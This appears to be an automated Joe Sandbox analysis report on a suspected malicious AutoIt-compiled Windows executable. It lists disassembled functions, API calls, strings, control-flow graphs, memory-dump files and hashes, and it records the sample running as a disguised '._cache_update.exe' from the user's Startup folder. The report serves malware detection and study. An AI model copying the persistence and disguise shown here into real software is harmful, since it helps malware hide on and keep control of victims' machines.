                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3964851224-0
                                                                                                                                                          • Opcode ID: a8d4f7dd0051db2a3462f5f7628952add1b2c63ea52d4f5276399f4fe41fedbc
                                                                                                                                                          • Instruction ID: 4380d7a7e869f1b2d7104e3f5d2d202fc6c2c4be886f60af05da592cde64b300
                                                                                                                                                          • Opcode Fuzzy Hash: a8d4f7dd0051db2a3462f5f7628952add1b2c63ea52d4f5276399f4fe41fedbc
                                                                                                                                                          • Instruction Fuzzy Hash: 2F9279706083418FDB24DF18C490B6AB7F0BF98304F55885DF99A8B262D775ED49CB92
                                                                                                                                                          Function 0019C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NameUser
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                          • Opcode ID: 4444fa54c10cca919301861c83a9ec1c743464fc92347e577980c3835911b793
                                                                                                                                                          • Instruction ID: 607ce9a2534eb910cacf55319cdea69af7471a037269b762fb601301705141bd
                                                                                                                                                          • Opcode Fuzzy Hash: 4444fa54c10cca919301861c83a9ec1c743464fc92347e577980c3835911b793
                                                                                                                                                          • Instruction Fuzzy Hash: E9C04CB140411DDFCB55CB90DA859EFB7BCBB04300F114495B116E2400D7709B859B71
                                                                                                                                                          Function 0012E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012E279
                                                                                                                                                          • timeGetTime.WINMM ref: 0012E51A
                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0012E646
                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0012E651
                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012E664
                                                                                                                                                          • LockWindowUpdate.USER32(00000000), ref: 0012E697
                                                                                                                                                          • DestroyWindow.USER32 ref: 0012E6A3
                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012E6BD
                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00195B15
                                                                                                                                                          • TranslateMessage.USER32(?), ref: 001962AF
                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 001962BD
                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001962D1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                          • API String ID: 2641332412-570651680
                                                                                                                                                          • Opcode ID: 810373cc188c14922d5f6baa788f6f13f65feca8e71bdfe4f63608bc5a3fb57f
                                                                                                                                                          • Instruction ID: 4e26ce0371d26b3362211aab395333a40786b09715d40cd38808e2319dd0f0ec
                                                                                                                                                          • Opcode Fuzzy Hash: 810373cc188c14922d5f6baa788f6f13f65feca8e71bdfe4f63608bc5a3fb57f
                                                                                                                                                          • Instruction Fuzzy Hash: D4622470508390DFDB24DF64E895BAA77E5BF54304F04493DF94A8B292DB71D888CB62
                                                                                                                                                          Function 00156A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ___createFile.LIBCMT ref: 00156C73
                                                                                                                                                          • ___createFile.LIBCMT ref: 00156CB4
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00156CDD
                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00156CE4
                                                                                                                                                          • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00156CF7
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00156D1A
                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00156D23
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00156D2C
                                                                                                                                                          • __set_osfhnd.LIBCMT ref: 00156D5C
                                                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00156DC6
                                                                                                                                                          • __close_nolock.LIBCMT ref: 00156DEC
                                                                                                                                                          • __chsize_nolock.LIBCMT ref: 00156E1C
                                                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00156E2E
                                                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00156F26
                                                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00156F3B
                                                                                                                                                          • __close_nolock.LIBCMT ref: 00156F9B
                                                                                                                                                            • Part of subcall function 0014F84C: CloseHandle.KERNEL32(00000000,001CEEC4,00000000,?,00156DF1,001CEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0014F89C
                                                                                                                                                            • Part of subcall function 0014F84C: GetLastError.KERNEL32(?,00156DF1,001CEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0014F8A6
                                                                                                                                                            • Part of subcall function 0014F84C: __free_osfhnd.LIBCMT ref: 0014F8B3
                                                                                                                                                            • Part of subcall function 0014F84C: __dosmaperr.LIBCMT ref: 0014F8D5
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00156FBD
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 001570F2
                                                                                                                                                          • ___createFile.LIBCMT ref: 00157111
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0015711E
                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00157125
                                                                                                                                                          • __free_osfhnd.LIBCMT ref: 00157145
                                                                                                                                                          • __invoke_watson.LIBCMT ref: 00157173
                                                                                                                                                          • __wsopen_helper.LIBCMT ref: 0015718D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                          • String ID: @
                                                                                                                                                          • API String ID: 3896587723-2766056989
                                                                                                                                                          • Opcode ID: 27807930a018964fdb6a3d508c6d3885d121a0d5117016554af1665eb4682a78
                                                                                                                                                          • Instruction ID: 620462258160374b636ada3b02075c2f3d073da96227a0755497b27a1bb7f6e5
                                                                                                                                                          • Opcode Fuzzy Hash: 27807930a018964fdb6a3d508c6d3885d121a0d5117016554af1665eb4682a78
                                                                                                                                                          • Instruction Fuzzy Hash: 4F224571A04106DFEF299F68DC927AD7B60EB15322F644229ED31AF2E1C7358D88C790
                                                                                                                                                          Function 001676DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 001676ED
                                                                                                                                                          • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00167713
                                                                                                                                                          • _wcscpy.LIBCMT ref: 00167741
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016774C
                                                                                                                                                          • _wcscat.LIBCMT ref: 00167762
                                                                                                                                                          • _wcsstr.LIBCMT ref: 0016776D
                                                                                                                                                          • 755A1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00167789
                                                                                                                                                          • _wcscat.LIBCMT ref: 001677D2
                                                                                                                                                          • _wcscat.LIBCMT ref: 001677D9
                                                                                                                                                          • _wcsncpy.LIBCMT ref: 00167804
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscat$FileInfoVersion$A1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                          • API String ID: 1513093770-1459072770
                                                                                                                                                          • Opcode ID: d28dc1fca4fa415569d9d3c53b21335f2144f06798292d60eed9e26cc1f302c7
                                                                                                                                                          • Instruction ID: 8857ce8ce07576addc1ea652568537f16a8704df5af61b722d90ba1b235894cf
                                                                                                                                                          • Opcode Fuzzy Hash: d28dc1fca4fa415569d9d3c53b21335f2144f06798292d60eed9e26cc1f302c7
                                                                                                                                                          • Instruction Fuzzy Hash: 4041D471A042007AE705AB64DC87EBF77ACDF65724F50006AF901A71A2FB74DA5186A1
                                                                                                                                                          Function 00121F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 608 121f04-121f9c call 122d1a * 2 call 12c935 * 2 call 127e53 call 12d3d2 * 3 625 192569-192575 call 142626 608->625 626 121fa2-121fa6 608->626 628 19257d-192583 call 15e4ea 625->628 626->628 629 121fac-121faf 626->629 632 19258f-19259b call 12a4f6 628->632 629->632 633 121fb5-121fb8 629->633 640 192899-19289d 632->640 641 1925a1-1925b1 call 12a4f6 632->641 633->632 636 121fbe-121fc7 GetForegroundWindow call 12200a 633->636 639 121fcc-121fe3 call 12197e 636->639 651 121fe4-122007 call 125cd3 * 3 639->651 643 1928ab-1928ae 640->643 644 19289f-1928a6 call 12c935 640->644 641->640 654 1925b7-1925c5 641->654 648 1928b0 643->648 649 1928b7-1928c4 643->649 644->643 648->649 652 1928d6-1928da 649->652 653 1928c6-1928d4 call 12b8a7 CharUpperBuffW 649->653 658 1928dc-1928df 652->658 659 1928f1-1928fa 652->659 653->652 657 1925c9-1925e1 call 15d68d 654->657 657->640 673 1925e7-1925f7 call 13f885 657->673 658->659 665 1928e1-1928ef call 12b8a7 CharUpperBuffW 658->665 660 19290b EnumWindows 659->660 661 1928fc-192909 GetDesktopWindow EnumChildWindows 659->661 666 192911-192930 call 15e44e call 122d1a 660->666 661->666 665->659 684 192940 666->684 685 192932-19293b call 12200a 666->685 680 19287b-19288b call 13f885 673->680 681 1925fd-19260d call 13f885 673->681 690 19288d-192891 680->690 691 192873-192876 680->691 692 192861-192871 call 13f885 681->692 693 192613-192623 call 13f885 681->693 685->684 690->651 694 192897 690->694 692->691 702 192842-192848 GetForegroundWindow 692->702 700 192629-192639 call 13f885 693->700 701 19281d-192836 call 1688a2 IsWindow 693->701 697 192852-192858 694->697 697->692 711 192659-192669 call 13f885 700->711 712 19263b-192640 700->712 701->651 709 19283c-192840 701->709 704 192849-192850 call 12200a 702->704 704->697 709->704 719 19266b-192675 711->719 720 19267a-19268a call 13f885 711->720 713 19280d-19280f 712->713 714 192646-192657 call 125cf6 712->714 717 192817-192818 713->717 724 19269b-1926a7 call 125be9 714->724 717->651 722 1927e6-1927f0 call 12c935 719->722 728 19268c-192698 call 125cf6 720->728 729 1926b5-1926c5 call 13f885 720->729 733 192804-192808 722->733 734 1926ad-1926b0 724->734 735 192811-192813 724->735 728->724 739 1926e3-1926f3 call 13f885 729->739 740 1926c7-1926de call 142241 729->740 733->657 734->733 735->717 745 192711-192721 call 13f885 739->745 746 1926f5-19270c call 142241 739->746 740->733 751 19273f-19274f call 13f885 745->751 752 192723-19273a call 142241 745->752 746->733 757 19276d-19277d call 13f885 751->757 758 192751-192768 call 142241 751->758 752->733 763 19277f-192793 call 142241 757->763 764 192795-1927a5 call 13f885 757->764 758->733 763->733 769 1927c3-1927d3 call 13f885 764->769 770 1927a7-1927b7 call 13f885 764->770 775 1927f2-192802 call 15d614 769->775 776 1927d5-1927da 769->776 770->691 777 1927bd-1927c1 770->777 775->691 775->733 778 1927dc-1927e2 776->778 779 192815 776->779 777->733 778->722 779->717
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00121FBE
                                                                                                                                                          • IsWindow.USER32(?), ref: 0019282E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Foreground_memmove
                                                                                                                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                          • API String ID: 3828923867-1919597938
                                                                                                                                                          • Opcode ID: 07e1df4bf572ac0f94dc2808b03dd77f9d3e39ea0c0478a766cd14a8f658c9b0
                                                                                                                                                          • Instruction ID: ebac92b640f0d05844c8c78b5f0e00913e2f54d36153fe58b8760700e5fd0ddb
                                                                                                                                                          • Opcode Fuzzy Hash: 07e1df4bf572ac0f94dc2808b03dd77f9d3e39ea0c0478a766cd14a8f658c9b0
                                                                                                                                                          • Instruction Fuzzy Hash: 6FD1E930504602FBCF0CEF20D581AA9BBE5BF74344F144A2DF456575A1DB30E9AACB92
                                                                                                                                                          Function 00124257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00000000,00000001,00000000), ref: 0012428C
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                            • Part of subcall function 00141BC7: __wcsicmp_l.LIBCMT ref: 00141C50
                                                                                                                                                          • _wcscpy.LIBCMT ref: 001243C0
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0019214E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe$CMDLINE$CMDLINERAW
                                                                                                                                                          • API String ID: 861526374-1399560292
                                                                                                                                                          • Opcode ID: da5cf19370c918b24b1b7867aebf94059aa81451be65d869e344093eda10af4a
                                                                                                                                                          • Instruction ID: 58ba8da17bd11a5e44cb4cf18705d453216c521e8ced1836a48e8c8c6ea84f85
                                                                                                                                                          • Opcode Fuzzy Hash: da5cf19370c918b24b1b7867aebf94059aa81451be65d869e344093eda10af4a
                                                                                                                                                          • Instruction Fuzzy Hash: 09816172900169ABCB09EBE0ED92EEF77B8EF25350F510029F541B7091EB706B54CBA1
                                                                                                                                                          Function 001678EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 934 1678ee-167911 WSAStartup 935 167917-167938 gethostname gethostbyname 934->935 936 1679b1-1679bd call 141943 934->936 935->936 937 16793a-167941 935->937 945 1679be-1679c1 936->945 939 167943 937->939 940 16794e-167950 937->940 942 167945-16794c 939->942 943 167952-16795f call 141943 940->943 944 167961-1679a6 call 13faa0 inet_ntoa call 143220 call 168553 call 141943 call 14017e 940->944 942->940 942->942 950 1679a9-1679af WSACleanup 943->950 944->950 950->945
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                          • String ID: 0.0.0.0
                                                                                                                                                          • API String ID: 208665112-3771769585
                                                                                                                                                          • Opcode ID: 51475b895b879711bfc2623b2a261d892b37ca381cb8fd05266104e45fde215c
                                                                                                                                                          • Instruction ID: f3ce19ed06b5ae5f30eff8e604f0319a4a791ed0669185a97130e35e34bb9a9a
                                                                                                                                                          • Opcode Fuzzy Hash: 51475b895b879711bfc2623b2a261d892b37ca381cb8fd05266104e45fde215c
                                                                                                                                                          • Instruction Fuzzy Hash: 8F11B471908115ABDB28A770EC4AEEA77BCDF5673CF0001A5F456960E1EF70DAC186A0
                                                                                                                                                          Function 0013E975 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 170COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0013EA39
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 0013EA56
                                                                                                                                                            • Part of subcall function 0014297D: __wsplitpath_helper.LIBCMT ref: 001429BD
                                                                                                                                                          • _wcsncat.LIBCMT ref: 0013EA69
                                                                                                                                                          • __makepath.LIBCMT ref: 0013EA85
                                                                                                                                                            • Part of subcall function 00142BFF: __wmakepath_s.LIBCMT ref: 00142C13
